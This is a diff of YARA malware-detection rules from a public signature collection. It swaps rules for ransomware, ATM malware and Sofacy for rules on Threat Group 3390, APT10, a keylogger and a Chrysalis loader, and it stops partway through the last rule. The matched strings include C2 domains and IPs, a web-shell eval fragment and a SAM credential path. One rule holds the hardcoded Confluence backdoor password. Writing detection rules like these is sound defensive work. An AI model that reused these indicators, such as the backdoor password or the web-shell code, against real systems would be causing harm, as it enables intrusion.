-		$x2 = { 52 00 45 00 50 00 4C 00 41 00 43 00 45 00 5F 00 43 00 4F 00 4D 00 4D 00 41 00 4E 00 44 00 5F 00 4C 00 49 00 4E 00 45 00 00 13 63 00 6D 00 73 00 74 00 70 00 2E 00 65 00 78 00 65 00 00 33 63 00 6D 00 73 00 74 00 70 00 2E 00 65 00 78 00 65 }
-		$x3 = { 52 00 45 00 50 00 4C 00 41 00 43 00 45 00 5F 00 43 00 4F 00 4D 00 4D 00 41 00 4E 00 44 00 5F 00 4C 00 49 00 4E 00 45 00 0D 00 0A 00 74 00 61 00 73 00 6B 00 6B 00 69 00 6C 00 6C 00 20 00 2F 00 49 00 4D 00 20 00 63 00 6D 00 73 00 74 00 70 00 2E 00 65 00 78 00 65 }
+		$s0 = "%d|%s|%04d/%02d/%02d %02d:%02d:%02d|%ld|%d" fullword wide
+		$s1 = "HttpBrowser/1.0" fullword wide
+		$s2 = "set cmd : %s" ascii fullword
+		$s3 = "\\config.ini" wide fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $x1 or 1 of ( $x2 , $x3 )
+		uint16( 0 ) == 0x5a4d and filesize < 45KB and filesize > 20KB and all of them
 }
-rule SIGNATURE_BASE_MAL_RANSOM_COVID19_Apr20_1 : FILE
+rule SIGNATURE_BASE_Plugx_Nvsmartmax_Gen : FILE
 {
 	meta:
-		description = "Detects ransomware distributed in COVID-19 theme"
+		description = "Threat Group 3390 APT Sample - PlugX NvSmartMax Generic"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fc723d1f-e969-5af6-af57-70d00bf797f4"
-		date = "2020-04-15"
+		id = "5ecd25a8-9717-527f-bb6e-3259b9a60458"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_covid_ransom.yar#L2-L20"
+		reference = "http://snip.ly/giNB"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_threatgroup_3390.yar#L126-L154"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9b32ce1dff9d27c5f7541de97cd1198b0d837a69ee260b327c66a22ca6f30091"
-		score = 75
+		logic_hash = "7795b0d978f9447a6cee808708d65992447e359539a8fe64331c06ad46ff7491"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "718fc72942b9b706488575c0296017971170463f6f40fa19b08fc84b79bf0cef"
+		hash2 = "1c0379481d17fc80b3330f148f1b87ff613cfd2a6601d97920a0bcd808c718d0"
+		hash3 = "555952aa5bcca4fa5ad5a7269fece99b1a04816d104ecd8aefabaa1435f65fa5"
+		hash4 = "71f7a9da99b5e3c9520bc2cc73e520598d469be6539b3c243fb435fe02e44338"
+		hash5 = "65bbf0bd8c6e1ccdb60cf646d7084e1452cb111d97d21d6e8117b1944f3dc71e"
 
 	strings:
-		$s1 = "/savekey.php" wide
-		$op1 = { 3f ff ff ff ff ff 0b b4 }
-		$op2 = { 60 2e 2e 2e af 34 34 34 b8 34 34 34 b8 34 34 34 }
-		$op3 = { 1f 07 1a 37 85 05 05 36 83 05 05 36 83 05 05 34 }
+		$s0 = "NvSmartMax.dll" fullword ascii
+		$s1 = "NvSmartMax.dll.url" fullword ascii
+		$s2 = "Nv.exe" fullword ascii
+		$s4 = "CryptProtectMemory failed" fullword ascii
+		$s5 = "CryptUnprotectMemory failed" fullword ascii
+		$s7 = "r%.*s(%d)%s" fullword wide
+		$s8 = " %s CRC " fullword wide
+		$op0 = { c6 05 26 49 42 00 01 eb 4a 8d 85 00 f8 ff ff 50 }
+		$op1 = { 8d 85 c8 fe ff ff 50 8d 45 c8 50 c6 45 47 00 e8 }
+		$op2 = { e8 e6 65 00 00 50 68 10 43 41 00 e8 56 84 00 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of ( $s* ) and 1 of ( $op* )
 }
-rule SIGNATURE_BASE_MAL_CRIME_Suspicious_Hex_String_Jun21_1 : CRIME PE FILE
+rule SIGNATURE_BASE_Httpbrowser_RAT_Dropper_Gen2 : FILE
 {
 	meta:
-		description = "Triggers on parts of a big hex string available in lots of crime'ish PE files."
-		author = "Nils Kuhnert"
-		id = "2ad208fa-c7a5-5df9-96fe-4a84dc770f0f"
-		date = "2021-06-04"
+		description = "Threat Group 3390 APT Sample - HttpBrowser RAT Dropper"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cd559642-a102-5946-8a7f-16c10e7f746d"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_crime_unknown.yar#L1-L16"
+		reference = "http://snip.ly/giNB"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_threatgroup_3390.yar#L156-L183"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "73144b14f3aa1a1d82df7710fa47049426bfbddeef75e85c8a0a559ad6ed05a3"
-		score = 65
+		logic_hash = "bf274053fe7729471716a710e3bd5ed027d6ab2c45f7af9a1103bfa1ada9cbf4"
+		score = 70
 		quality = 85
-		tags = "CRIME, PE, FILE"
-		hash1 = "37d60eb2daea90a9ba275e16115848c95e6ad87d20e4a94ab21bd5c5875a0a34"
-		hash2 = "3380c8c56d1216fe112cbc8f1d329b59e2cd2944575fe403df5e5108ca21fc69"
-		hash3 = "cd283d89b1b5e9d2875987025009b5cf6b137e3441d06712f49e22e963e39888"
-		hash4 = "404efa6fb5a24cd8f1e88e71a1d89da0aca395f82d8251e7fe7df625cd8e80aa"
-		hash5 = "479bf3fb8cff50a5de3d3742ab4b485b563b8faf171583b1015f80522ff4853e"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c57c5a2c322af2835ae136b75283eaaeeaa6aa911340470182a9983ae47b8992"
+		hash2 = "dfa984174268a9f364d856fd47cfaca75804640f849624d69d81fcaca2b57166"
 
 	strings:
-		$a1 = "07032114130C0812141104170C0412147F6A6A0C041F321104130C0412141104030C0412141104130C0412141104130C0412141104130C0412141104130C0412141104130C0412141104130C0412141122130C0412146423272A711221112B1C042734170408622513143D20262B0F323038692B312003271C170B3A2F286623340610241F001729210579223202642200087C071C17742417020620141462060F12141104130C0412141214001C0412011100160C0C002D2412130C0412141104130C04121A11041324001F140122130C0134171" ascii
+		$s1 = "navlu.dll.urlUT" fullword ascii
+		$s2 = "VPDN_LU.exeUT" fullword ascii
+		$s3 = "pnipcn.dllUT" fullword ascii
+		$s4 = "\\ssonsvr.exe" ascii
+		$s5 = "/c del /q %s" fullword ascii
+		$s6 = "\\setup.exe" ascii
+		$s7 = "msi.dllUT" fullword ascii
+		$op0 = { 8b 45 0c 83 38 00 0f 84 98 }
+		$op1 = { e8 dd 07 00 00 ff 35 d8 fb 40 00 8b 35 7c a0 40 }
+		$op2 = { 83 fb 08 75 2c 8b 0d f8 af 40 00 89 4d dc 8b 0d }
+		$op3 = { c7 43 18 8c 69 40 00 e9 da 01 00 00 83 7d f0 00 }
+		$op4 = { 6a 01 e9 7c f8 ff ff bf 1a 40 00 96 1b 40 00 01 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 10MB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and 3 of ( $s* ) and 1 of ( $op* )
 }
-rule SIGNATURE_BASE_MAL_CRIME_Unknown_LNK_Jun21_1 : LNK POWERSHELL FILE
+rule SIGNATURE_BASE_Threatgroup3390_Strings : FILE
 {
 	meta:
-		description = "Triggers on malicious link files which calls powershell with an obfuscated payload and downloads an HTA file."
-		author = "Nils Kuhnert"
-		id = "d1aac420-fd91-5577-8efd-fcdd7f733981"
-		date = "2021-06-04"
+		description = "Threat Group 3390 APT - Strings"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9a44393b-5220-5376-ba18-2330f4623cd6"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_crime_unknown.yar#L18-L33"
+		reference = "http://snip.ly/giNB"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_threatgroup_3390.yar#L185-L202"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "460e764cbd9fbfa1a2156059d0042a0bea5a939d501050a733a789d236015d37"
-		score = 75
+		logic_hash = "d1e4889a48f4f9bfcc12237dd44cd8ad9db9918c6a5859de086d1ddc051ff937"
+		score = 60
 		quality = 85
-		tags = "LNK, POWERSHELL, FILE"
-		hash1 = "8fc7f25da954adcb8f91d5b0e1967e4a90ca132b280aa6ae73e150b55d301942"
-		hash2 = "f5da192f4e4dfb6b728aee1821d10bec6d68fb21266ce32b688e8cae7898a522"
-		hash3 = "183a9b3c04d16a1822c788d7a6e78943790ee2cdeea12a38e540281091316e45"
-		hash4 = "a38c6aa3e1c429a27226519b38f39f03b0b1b9d75fd43cd7e067c5e542967afe"
-		hash5 = "455f7b6b975fb8f7afc6295ec40dae5696f5063d1651f3b2477f10976a3b67b2"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$uid = "S-1-5-21-1437133880-1006698037-385855442-1004" wide
+		$s1 = "\"cmd\" /c cd /d \"c:\\Windows\\Temp\\\"&copy" ascii
+		$s2 = "svchost.exe a -k -r -s -m5 -v1024000 -padmin-windows2014"
+		$s3 = "ren *.rar *.zip" fullword ascii
+		$s4 = "c:\\temp\\ipcan.exe" fullword ascii
+		$s5 = "<%eval(Request.Item(\"admin-na-google123!@#" ascii
 
 	condition:
-		uint16( 0 ) == 0x004c and all of them
+		1 of them and filesize < 30KB
 }
-rule SIGNATURE_BASE_MAL_CRIME_Unknown_ISO_Jun21_1 : ISO POWERSHELL LNK FILE
+rule SIGNATURE_BASE_Threatgroup3390_C2 : FILE
 {
 	meta:
-		description = "Triggers on ISO files that mimick NOBELIUM TTPs, but uses LNK files that call powershell instead."
-		author = "Nils Kuhnert"
-		id = "73a1fc44-45c4-5253-b81d-fa6686dc0644"
-		date = "2021-06-04"
+		description = "Threat Group 3390 APT - C2 Server"
+		author = "Florian Roth (Nextron Systems)"
+		id = "232b5052-e349-55f1-bd7e-1afc5d35abe4"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_crime_unknown.yar#L35-L50"
+		reference = "http://snip.ly/giNB"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_threatgroup_3390.yar#L204-L323"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "49b61f498d3f4ee249d9687277e581a39e08ebb4e1a293170058fb5f770bde1f"
-		score = 75
-		quality = 85
-		tags = "ISO, POWERSHELL, LNK, FILE"
-		hash1 = "425dbed047dd2ce760d0848ebf7ad04b1ca360f111d557fc7bf657ae89f86d36"
-		hash2 = "f6944b6bca627e219d9c5065f214f95eb2226897a3b823b645d0fd78c281b149"
-		hash3 = "14d70a8bdd64e9a936c2dc9caa6d4506794505e0e3870e3a25d9d59bcafb046e"
-		hash4 = "9b2ca8eb6db34b07647a74171a5ff4c0a2ca8000da9876ed2db6361958c5c080"
+		logic_hash = "be411bb8e301eb4ba611bc9d6c8f0e3b8c27b87c2dd3f8405d0eba0296117697"
+		score = 60
+		quality = 60
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$uid = "S-1-5-21-1437133880-1006698037-385855442-1004" wide
-		$magic = "CD001" ascii
+		$s1 = "api.apigmail.com"
+		$s2 = "apigmail.com"
+		$s3 = "backup.darkhero.org"
+		$s4 = "bel.updatawindows.com"
+		$s5 = "binary.update-onlines.org"
+		$s6 = "blackcmd.com"
+		$s7 = "castle.blackcmd.com"
+		$s8 = "ctcb.blackcmd.com"
+		$s9 = "darkhero.org"
+		$s10 = "dav.local-test.com"
+		$s11 = "test.local-test.com"
+		$s12 = "dev.local-test.com"
+		$s13 = "ocean.local-test.com"
+		$s14 = "ga.blackcmd.com"
+		$s15 = "helpdesk.blackcmd.com"
+		$s16 = "helpdesk.csc-na.com"
+		$s17 = "helpdesk.hotmail-onlines.com"
+		$s18 = "helpdesk.lnip.org"
+		$s19 = "hotmail-onlines.com"
+		$s20 = "jobs.hotmail-onlines.com"
+		$s21 = "justufogame.com"
+		$s22 = "lnip.org"
+		$s23 = "local-test.com"
+		$s24 = "login.hansoftupdate.com"
+		$s25 = "long.update-onlines.org"
+		$s26 = "longlong.update-onlines.org"
+		$s27 = "longshadow.dyndns.org"
+		$s28 = "longshadow.update-onlines.org"
+		$s29 = "longykcai.update-onlines.org"
+		$s30 = "lostself.update-onlines.org"
+		$s31 = "mac.navydocument.com"
+		$s32 = "mail.csc-na.com"
+		$s33 = "mantech.updatawindows.com"
+		$s34 = "micr0soft.org"
+		$s35 = "microsoft-outlook.org"
+		$s36 = "mtc.navydocument.com"
+		$s37 = "navydocument.com"
+		$s38 = "mtc.update-onlines.org"
+		$s39 = "news.hotmail-onlines.com"
+		$s40 = "oac.3322.org"
+		$s41 = "ocean.apigmail.com"
+		$s42 = "pchomeserver.com"
+		$s43 = "registre.organiccrap.com"
+		$s44 = "security.pomsys.org"
+		$s45 = "services.darkhero.org"
+		$s46 = "sgl.updatawindows.com"
+		$s47 = "shadow.update-onlines.org"
+		$s48 = "sonoco.blackcmd.com"
+		$s49 = "test.logmastre.com"
+		$s50 = "up.gtalklite.com"
+		$s51 = "updatawindows.com"
+		$s52 = "update-onlines.org"
+		$s53 = "update.deepsoftupdate.com"
+		$s54 = "update.hancominc.com"
+		$s55 = "update.micr0soft.org"
+		$s56 = "update.pchomeserver.com"
+		$s57 = "urs.blackcmd.com"
+		$s58 = "wang.darkhero.org"
+		$s59 = "webs.local-test.com"
+		$s60 = "word.apigmail.com"
+		$s61 = "wordpress.blackcmd.com"
+		$s62 = "working.blackcmd.com"
+		$s63 = "working.darkhero.org"
+		$s64 = "working.hotmail-onlines.com"
+		$s65 = "www.trendmicro-update.org"
+		$s66 = "www.update-onlines.org"
+		$s67 = "x.apigmail.com"
+		$s68 = "ykcai.update-onlines.org"
+		$s69 = "ykcailostself.dyndns-free.com"
+		$s70 = "ykcainobody.dyndns.org"
+		$s71 = "zj.blackcmd.com"
+		$s72 = "laxness-lab.com"
+		$s73 = "google-ana1ytics.com"
+		$s74 = "www.google-ana1ytics.com"
+		$s75 = "ftp.google-ana1ytics.com"
+		$s76 = "hotmailcontact.net"
+		$s77 = "208.115.242.36"
+		$s78 = "208.115.242.37"
+		$s79 = "208.115.242.38"
+		$s80 = "66.63.178.142"
+		$s81 = "72.11.148.220"
+		$s82 = "72.11.141.133"
+		$s83 = "74.63.195.236"
+		$s84 = "74.63.195.236"
+		$s85 = "74.63.195.237"
+		$s86 = "74.63.195.238"
+		$s87 = "103.24.0.142"
+		$s88 = "103.24.1.54"
+		$s89 = "106.187.45.162"
+		$s90 = "192.151.236.138"
+		$s91 = "192.161.61.19"
+		$s92 = "192.161.61.20"
+		$s93 = "192.161.61.22"
+		$s94 = "103.24.1.54"
+		$s95 = "67.215.232.179"
+		$s96 = "96.44.177.195"
+		$s97 = "49.143.192.221"
+		$s98 = "67.215.232.181"
+		$s99 = "67.215.232.182"
+		$s100 = "96.44.182.243"
+		$s101 = "96.44.182.245"
+		$s102 = "96.44.182.246"
+		$s103 = "49.143.205.30"
+		$s104 = "working_success@163.com"
+		$s105 = "ykcaihyl@163.com"
+		$s106 = "working_success@163.com"
+		$s107 = "yuming@yinsibaohu.aliyun.com"
 
 	condition:
-		filesize < 5MB and all of them
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule SIGNATURE_BASE_ATM_Malware_Xfscashncr_1 : FILE
+
+rule SIGNATURE_BASE_APT_APT10_Malware_Imphash_Dec18_1 : FILE
 {
 	meta:
-		description = "Detects ATM Malware XFSCashNCR"
-		author = "Frank Boldewin (@r3c0nst), modified by Florian Roth"
-		id = "0a70ef9a-9dde-54c9-a3a2-dfceff32932b"
-		date = "2019-08-28"
+		description = "Detects APT10 malware based on ImpHashes"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2de195a3-63a4-50ac-a83d-ab0db0f784bf"
+		date = "2018-12-28"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/r3c0nst/status/1166773324548063232"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_atm_xfscashncr.yar#L2-L23"
+		reference = "AlienVault OTX IOCs - statistical sample analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt10.yar#L1390-L1406"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "014d07115543c6e041649a1c57206a75fd555bf0458c7578a33c81b473c72751"
+		logic_hash = "d6e2f23f3809e7a7064bfe4859db3480454a9c8b21ffac2e1e8b7b8a8906de93"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "d6dff67a6b4423b5721908bdcc668951f33b3c214e318051c96e8c158e8931c0"
-
-	strings:
-		$Code1 = {50 8b 4d e8 8b 51 10 52 6a 00 68 2d 01 00 00 8b 45 e8 0f b7 48 1c 51 e8}
-		$Code2 = {52 8d 45 d0 50 68 2e 01 00 00 8b 4d e8 0f b7 51 1c 52 e8}
-		$x_StatusMessage1 = "[+] Ingrese Denominacion ISO" nocase ascii
-		$x_StatusMessage2 = "[+] Ingrese numero de billetes" nocase ascii
-		$x_StatusMessage3 = "[!] FAIL.. dispensadores no encontrados" nocase ascii
-		$x_StatusMessage4 = "[!] Unable continue, IMPOSIBLE abrir dispenser" nocase ascii
-		$x_PDB = "C:\\Users\\cyttek\\Downloads\\xfs_cashXP\\Debug\\xfs_cash_ncr.pdb" nocase ascii
-		$LogFile = "XfsLog.txt" nocase ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 1500KB and ( 1 of ( $x* ) or 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 6000KB and ( pe.imphash ( ) == "0556ff5e5f8744bff47d4921494ba46d" or pe.imphash ( ) == "cb1194123f68a68eb14552c085b620ce" or pe.imphash ( ) == "efad9ff8c0d2a6419bf1dd970bcd806d" or pe.imphash ( ) == "7a861cd9c495e1d950a43cb708a22985" or pe.imphash ( ) == "a5d0545030be75a421529c2b0be6c4bd" or pe.imphash ( ) == "94491f4a812b0297419dc888aa4fd2a5" )
 }
-rule SIGNATURE_BASE_Apt_Sofacy_Xtunnel : FILE
+rule SIGNATURE_BASE_APT_NK_MAL_Keylogger_Unknown_Nov19_1 : FILE
 {
 	meta:
-		description = "Sofacy Malware - German Bundestag"
-		author = "Claudio Guarnieri"
-		id = "aef091b5-cedf-5443-ab61-8b2dbc7e77fd"
-		date = "2016-02-15"
+		description = "Detects unknown keylogger reported by CNMF in November 2019"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5311d883-52e0-5503-9494-c583fabbedfe"
+		date = "2019-11-06"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_xtunnel_bundestag.yar#L3-L24"
+		reference = "https://twitter.com/CNMF_VirusAlert/status/1192131508007505921"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_gen.yar#L2-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2478d9d8996bf4a142e39eac0e2d6af718d364be080a89530812615595777efd"
+		logic_hash = "a3b5c82cb8aa09e3c1b955bb175046e86f96da1f187eb46df83caaaf9e1370b2"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		hash1 = "04d70bb249206a006f83db39bbe49ff6e520ea329e5fbb9c758d426b1c8dec30"
+		hash2 = "618a67048d0a9217317c1d1790ad5f6b044eaa58a433bd46ec2fb9f9ff563dc6"
 
 	strings:
-		$xaps = ":\\PROJECT\\XAPS_"
-		$variant11 = "XAPS_OBJECTIVE.dll"
-		$variant12 = "start"
-		$variant21 = "User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0"
-		$variant22 = "is you live?"
-		$mix1 = "176.31.112.10"
-		$mix2 = "error in select, errno %d"
-		$mix3 = "no msg"
-		$mix4 = "is you live?"
-		$mix5 = "127.0.0.1"
-		$mix6 = "err %d"
-		$mix7 = "i`m wait"
-		$mix8 = "hello"
-		$mix9 = "OpenSSL 1.0.1e 11 Feb 2013"
-		$mix10 = "Xtunnel.exe"
+		$x1 = "CKeyLogDlg::Keylogger_WriteFile" ascii
+		$x2 = "Keylog file is saved >>>>>> %s" fullword ascii
+		$x3 = "MicCap file is saved >>>>>> %s" fullword ascii
+		$x4 = "cr5cr33nc4p.dat" fullword ascii
+		$xc1 = { 73 74 61 74 75 73 00 00 5C 4B 65 79 6C 6F 67 }
+		$xc2 = { 5B 43 4D 69 63 43 61 70 44 6C 67 5D 2E 00 00 00
+               25 30 34 64 25 30 32 64 25 30 32 64 25 30 32 64
+               25 30 32 64 2E 77 61 76 }
+		$xc3 = { 25 73 00 00 25 73 5C 2A 2E 2A 00 00 61 62 00 00
+               5B 25 73 5D 20 75 70 6C 6F 61 64 20 66 61 69 6C
+               65 64 2E 00 72 62 00 00 5B 25 73 5D 20 6F 70 65
+               6E 20 66 61 69 6C 65 64 2E 00 00 00 2E 2E 00 00
+               5B 25 73 20 2D 3E 20 25 73 5D 20 63 6F 70 79 20
+               66 61 69 6C 65 64 }
+		$s1 = "%s\\cmd.exe /c %s" fullword ascii
+		$s2 = "File upload error occured in [CFSDlg::ProcessResultMessage]." fullword ascii
+		$s3 = "\\SAM\\Domains\\Account\\Users\\Names" ascii
+		$s4 = "%s_hist%d:%d:%s:%s:::" fullword ascii
+		$s5 = "CARAT_Ws2_32.dll" fullword ascii
+		$s6 = "PID [%s], open process failed." fullword ascii
 
 	condition:
-		(( uint16( 0 ) == 0x5A4D ) or ( uint16( 0 ) == 0xCFD0 ) ) and ( ( $xaps ) or ( all of ( $variant1* ) ) or ( all of ( $variant2* ) ) or ( 6 of ( $mix* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize <= 40000KB and ( 1 of ( $x* ) or 4 of them )
 }
-
-rule SIGNATURE_BASE_Winexe_Remoteexec : FILE
+rule SIGNATURE_BASE_VULN_Confluence_Questions_Plugin_CVE_2022_26138_Jul22_1 : CVE_2022_26138
 {
 	meta:
-		description = "Winexe tool for remote execution (also used by Sofacy group)"
-		author = "Florian Roth (Nextron Systems), Robert Simmons"
-		id = "5079557a-0461-5b04-b0f2-4265bf7ec041"
-		date = "2015-06-19"
-		modified = "2021-02-11"
-		reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_xtunnel_bundestag.yar#L26-L48"
+		description = "Detects properties file of Confluence Questions plugin with static user name and password (backdoor) CVE-2022-26138"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1443c673-2a86-5431-876a-c8fccba52190"
+		date = "2022-07-21"
+		modified = "2023-12-05"
+		reference = "https://www.bleepingcomputer.com/news/security/atlassian-fixes-critical-confluence-hardcoded-credentials-flaw/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vul_confluence_questions_plugin_cve_2022_26138.yar#L2-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9e944f07b43b934346c0e88685014c05ff81561ac2f7c3374b55b9c4523b98c1"
-		score = 70
+		logic_hash = "c164bd3d9ed1e155d51112e14340b814f6ea782604540c84a6e9efb5c6041156"
+		score = 50
 		quality = 85
-		tags = "FILE"
-		hash1 = "5130f600cd9a9cdc82d4bad938b20cbd2f699aadb76e7f3f1a93602330d9997d"
-		hash2 = "d19dfdbe747e090c5aa2a70cc10d081ac1aa88f360c3f378288a3651632c4429"
+		tags = "CVE-2022-26138"
 
 	strings:
-		$s1 = "error Cannot LogonUser(%s,%s,%s) %d" ascii fullword
-		$s2 = "error Cannot ImpersonateNamedPipeClient %d" ascii fullword
-		$s3 = "\\\\.\\pipe\\ahexec" fullword ascii
-		$s4 = "\\\\.\\pipe\\wmcex" fullword ascii
-		$s5 = "implevel" fullword ascii
+		$x_plain_1 = "predefined.user.password=disabled1system1user6708"
+		$jar_marker = "/confluence/plugins/questions/"
+		$jar_size_1 = { 00 CC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+      /*    here starts default.properties v                          */
+                      ?? ?? ?? ?? ?? ?? 00 64 65 66 61 75 6C 74 2E 70
+                      72 6F 70 65 72 74 69 65 73 50 4B }
+		$jar_size_2 = { 00 CC 00 ?? ?? ?? ?? ?? 00 64 65 66 61 75 6C 74
+                      2E 70 72 6F 70 65 72 74 69 65 73 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 115KB and ( 3 of them or pe.imphash ( ) == "2f8a475933ac82b8e09eaf26b396b54d" )
+		1 of ( $x* ) or ( $jar_marker and 1 of ( $jar_size* ) )
 }
-rule SIGNATURE_BASE_Sofacy_Mal2 : FILE
+rule SIGNATURE_BASE_MAL_Chrysalis_Dllloader_Feb26 : FILE
 {
 	meta:
-		description = "Sofacy Group Malware Sample 2"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1547cc67-7d7c-5ec9-816c-15b7d523376a"
-		date = "2015-06-19"
-		modified = "2023-12-05"
-		reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_xtunnel_bundestag.yar#L50-L67"
+		description = "Detects DLL used to load Chrysalis backdoor, seen being used in the compromise of the infrastructure hosting Notepad++ by Chinese APT group Lotus Blossom"
+		author = "X__Junior"
+		id = "e7be7399-98e3-5809-bee5-c32e86c896ba"
+		date = "2026-02-02"
+		modified = "2026-02-04"
+		reference = "https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/lotusblossom_notepad_exploitation.yar#L1-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "566ab945f61be016bfd9e83cc1b64f783b9b8deb891e6d504d3442bc8281b092"
-		logic_hash = "c325ed815b7de3338363d064f4097edf0596644d4ef8d642fda3664a2a16c2eb"
-		score = 70
+		hash = "3bdc4c0637591533f1d4198a72a33426c01f69bd2e15ceee547866f65e26b7ad"
+		logic_hash = "5e118287bd048788a746d412d00ddd2596224b30562d66c4441738fcc09cee87"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "PROJECT\\XAPS_OBJECTIVE_DLL\\" ascii
-		$x2 = "XAPS_OBJECTIVE.dll" fullword ascii
-		$s1 = "i`m wait" fullword ascii
+		$op1 = { 33 D2 8B C1 F7 F6 0F B6 C1 03 55 ?? 6B C0 ?? 32 02 88 04 0F 41 83 F9 ?? 72 }
+		$op2 = { 0F B6 04 31 41 33 C2 69 D0 ?? ?? ?? ?? 3B CB 72 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) ) and $s1
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_Sofacy_Mal3 : FILE
+rule SIGNATURE_BASE_MAL_Chrysalis_Shellcode_Loader_Feb26
 {
 	meta:
-		description = "Sofacy Group Malware Sample 3"
-		author = "Florian Roth (Nextron Systems)"
-		id = "67d002ef-4ed9-54ce-a6ef-49b7f3b951e2"
-		date = "2015-06-19"
-		modified = "2023-01-06"
-		reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_xtunnel_bundestag.yar#L69-L99"
